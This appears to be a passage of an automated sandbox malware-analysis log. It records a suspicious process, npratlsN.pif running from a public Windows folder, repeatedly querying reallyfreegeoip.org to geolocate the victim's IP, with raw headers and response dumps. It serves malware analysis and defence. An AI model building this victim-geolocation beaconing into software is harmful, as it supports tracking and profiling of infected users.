                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mSCISlFuf7YXcjqfLgrD9MxtaL82ME%2BT%2FeO4PnLbMdjFeK3HJeOx6MnTzSexl7CwuDEBhIjUXr85A7%2B7VWVyL3pSgqfnBS%2BUNi7A%2FG%2F79zmvgWTzU6Llu12n6I6PgGgjxkw%2FGLbk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9caf61afa8c65-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2012&rtt_var=767&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1414043&cwnd=204&unsent_bytes=0&cid=1b097354527a42b3&ts=156&x=0"
                                                                                                                                                                        2025-01-06 06:53:45 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        16192.168.2.449789188.114.96.34437692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:45 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:45 UTC865INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:45 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461214
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FcqhEAZ9TAbt%2Be7fYRoI%2Bc0IiunGqcrIwv5pqXXC%2B1LRfRmgcqPWdUUwFDIWJbd%2FPqF1SN0DRgpRBqiRcMFsbWyYoHDttCFK6Dy%2F6GS1%2B3OMhFFy4FcDFXn%2BrrrDfeOvkff7joPe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9caf8ac7b4277-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1878&min_rtt=1871&rtt_var=716&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1514522&cwnd=191&unsent_bytes=0&cid=ce9b758ea916706c&ts=258&x=0"
                                                                                                                                                                        2025-01-06 06:53:45 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        17192.168.2.449792188.114.96.34433980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:46 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:46 UTC855INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:46 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461215
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o93kGhyrciBnJCw0WZeFdFfyHdnLPtzK7%2FxWgMflNf9uqIkHMiOA5AyD5PYklR1T4Scr2c0HBcYsbNxlWsjLRu%2BAEPtfBG4u70RmyG7N555Xx4jFF9npU%2B7powlm9JIqno8Z7qZb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cafd9dcf43da-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1566&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1795817&cwnd=203&unsent_bytes=0&cid=a700d585ede34eeb&ts=139&x=0"
                                                                                                                                                                        2025-01-06 06:53:46 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        18192.168.2.449791188.114.96.34437692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:46 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        2025-01-06 06:53:46 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:46 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461215
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JEVCMO2gWm5wz8zgozhh27N3No7wqTB81s5PoXSOWujBkFaSm3ingcf3i3SUzUUWGEJgAWi3c56ZGN6bg%2FpntPgS9SYF9s0ogF0Q%2BtxRnRRvi1u5JzUUMICURicueJjY0IoH9sXA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cafdcd1672b9-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4505&min_rtt=2026&rtt_var=2442&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1441263&cwnd=214&unsent_bytes=0&cid=8f311243ef6b99d1&ts=155&x=0"
                                                                                                                                                                        2025-01-06 06:53:46 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        19192.168.2.449795188.114.96.34433980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:48 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        2025-01-06 06:53:48 UTC855INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:48 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461217
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9HSsfwQmZHgZONzyr5Hw7lbvgjQVmBQuvsBdYtbtSEIFk30vND0SndK1adr9uAaFtRqXzZcHkI10VKxuCCJkjPnQBIQvmEua7V32JYRstxxwscNW2B%2F%2FCmmEWFXsLqdZ0PG%2FLuwE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb093fb143bd-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1586&rtt_var=625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1710603&cwnd=190&unsent_bytes=0&cid=cc14b7b658cb2a13&ts=173&x=0"
                                                                                                                                                                        2025-01-06 06:53:48 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        20192.168.2.449798188.114.96.34437692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:49 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        2025-01-06 06:53:49 UTC862INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:49 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461218
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IOAIMwWkyWazjzBAo%2BdJDqfJOCXgX%2FZEDiq7H9fi2LcHd33PY0k9ooV8kwJdWWtyiS7SN0yg6%2BrOr6aa%2BSjBu%2Ff73qXxx5Vry9Mg6WBm1YG7W45yDfAdke%2FFOAcADlJijKUMP%2BpH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb0e985c334e-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2002&min_rtt=2000&rtt_var=755&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1445544&cwnd=32&unsent_bytes=0&cid=bc7595ba6fe10db7&ts=170&x=0"
                                                                                                                                                                        2025-01-06 06:53:49 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        21192.168.2.449799188.114.96.34433980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:49 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:49 UTC857INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:49 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461218
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xzdZ0L34bv7mvT%2BqL13Yw0bEasPA04MCW9tKDekMSOz33aE13gcQyt7xMH6FSjI7f0U%2F46MGvyGdOt844A8DPoaYb2THhISeFV2u8otJnRT2SrDv1INFImM%2BQU6eG%2BTkwSVfOiHM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb11a996439a-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1606&rtt_var=617&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1750599&cwnd=233&unsent_bytes=0&cid=f224d6f594ff932f&ts=155&x=0"
                                                                                                                                                                        2025-01-06 06:53:49 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        22192.168.2.449802188.114.96.34437692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:50 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        2025-01-06 06:53:50 UTC859INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:50 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461219
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1y0GeG%2BPe2KRKNkHDW9OqTFC4qqXke2%2FRtbFzGuqWtsXNU8HkYKcP4fkfI%2FqgzAfYQJsk9PILeJV2tbITDYD3v3%2BNrwGl1eBlFBt1TL07HfV8BUz7QJLsCNVCffM6txFqt3zS%2Fh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb163f460f36-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1520&min_rtt=1515&rtt_var=579&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1871794&cwnd=231&unsent_bytes=0&cid=67c2f8e7e325de0d&ts=145&x=0"
                                                                                                                                                                        2025-01-06 06:53:50 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        23192.168.2.449804188.114.96.34433980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:51 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:51 UTC851INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:51 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461220
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UhmxYeCRVD2Nlni801NJLExKj8E9hCtFkMSYHTpXt5bhvh3fz75s%2BesndcFvKc1XhKLVMOJ8J525xSRMm4k5cW1ZlC66OERddS0EigCn1SI0zPMSyvVSr2uWhk8BKPEz7pamFAtS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb1bbf82f791-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1628&min_rtt=1621&rtt_var=622&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1740166&cwnd=147&unsent_bytes=0&cid=5d47f9c94fb9d825&ts=142&x=0"
